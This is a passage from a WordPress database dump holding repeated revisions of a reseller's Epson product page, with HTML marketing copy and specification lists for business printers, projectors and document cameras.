Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.\n<ul>\n 	<li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li>\n 	<li>WXGA Resolution</li>\n 	<li>Real-Time Auto Keystone Correction</li>\n 	<li>Split Screen Projection</li>\n 	<li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INTERACTIVE</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-536WiÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></h4>\nWith the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.\n<ul>\n 	<li>WXGA Resolution</li>\n 	<li>White and Colour Brightness at 3,300lm</li>\n 	<li>Multi-PC projection</li>\n 	<li>HDMI Connectivity x2</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p><strong>Epson EB-L1405UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-G7400UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-Z10000UÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-26 10:52:09','2019-09-26 02:52:09','',1486,'https://bintara.com.my/blog/2019/09/26/1486-revision-v1/',0,'revision','',0),(3494,1,'2019-09-26 10:52:56','2019-09-26 02:52:56','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /><br>\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INK TANK SYSTEM</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EcoTank L3150</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L120 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson M1100 Printer</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n		<center>[maxbutton id=\"12\" ]</center>		\n			<h2>LASER PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson AcuLaser C9300N</strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /><br>\nThe Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Speed: Up to 30ppm</li>\n 	<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li>\n 	<li>Quality prints with new Epson Technologies</li>\n 	<li>New print job management features</li>\n</ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\">Â <strong>Epson WorkForce AL-M320DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /><br>\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 35ppm</li>\n 	<li>Auto-Duplex</li>\n 	<li>Ethernet &amp; Epson iPrint</li>\n 	<li>2 optional paper cassette tray</li>\n</ul>[maxbutton id=\"12\" ]<h4><strong>Epson WorkForce AL-M8100DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /><br><br>\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 40 ppm</li>\n 	<li>Epson iPrint</li>\n 	<li>Ethernet</li>\n 	<li>4 optional cassette trays</li>\n</ul>[maxbutton id=\"12\" ]		\n			<h2>POS PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson TM-H6000IVÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T88V-iÂ </strong>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></h4>\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\n<ul>\n 	<li>Printing speed of up to 300mm/second</li>\n 	<li>20 million lines for printer mechanism</li>\n 	<li>Up to 2 million for auto-cutter</li>\n 	<li>LAN, Serial, USB 2.0 (Type A) x 4</li>\n 	<li>Control peripherals easily</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T70IIÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /><br /><br /></h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h2>PHOTO PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></h4><p><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"241\" height=\"175\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson L850 PrinterÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L805 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></h4><p><br />The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h2>Projectors for Work</h2>		\n			<h2>CORPORATE AND EDUCATIONÂ </h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-2055</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson EB-2142W</strong>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></h4>\nEnjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.\n<ul>\n 	<li>White and Colour Brightness at 4,200lm</li>\n 	<li>WXGA Resolution</li>\n 	<li>12000 hours lamp life in eco-mode</li>\n 	<li>MHL-enabled</li>\n 	<li>Multi-PC Projection</li>\n 	<li>Horizontal Keystone Slider</li>\n 	<li>Miracast<sup>Â®</sup></li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>\n<h4 style=\"text-align: center;\"><strong>Epson EB-L500WÂ </strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" />\nThe compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.\n<ul>\n 	<li>5,000 lumens colour/white brightness<sup>Â </sup></li>\n 	<li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li>\n 	<li>Laser light source of up to 20,000 hours</li>\n 	<li>Virtually maintenance-free for optical engine life</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>ACCENT LIGHTING LASER PROJECTORS</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson LightScene EV-105</strong><br /><br /></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h2>ULTRA PORTABLE</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-1785WÂ </strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"238\" height=\"177\" />\nThe Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.\n<ul>\n 	<li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li>\n 	<li>WXGA Resolution</li>\n 	<li>Real-Time Auto Keystone Correction</li>\n 	<li>Split Screen Projection</li>\n 	<li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INTERACTIVE</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-536WiÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></h4>\nWith the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.\n<ul>\n 	<li>WXGA Resolution</li>\n 	<li>White and Colour Brightness at 3,300lm</li>\n 	<li>Multi-PC projection</li>\n 	<li>HDMI Connectivity x2</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p><strong>Epson EB-L1405UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-G7400UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-Z10000UÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-26 10:52:56','2019-09-26 02:52:56','',1486,'https://bintara.com.my/blog/2019/09/26/1486-revision-v1/',0,'revision','',0),(3495,1,'2019-09-26 10:53:28','2019-09-26 02:53:28','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /><br>\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INK TANK SYSTEM</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EcoTank L3150</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L120 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 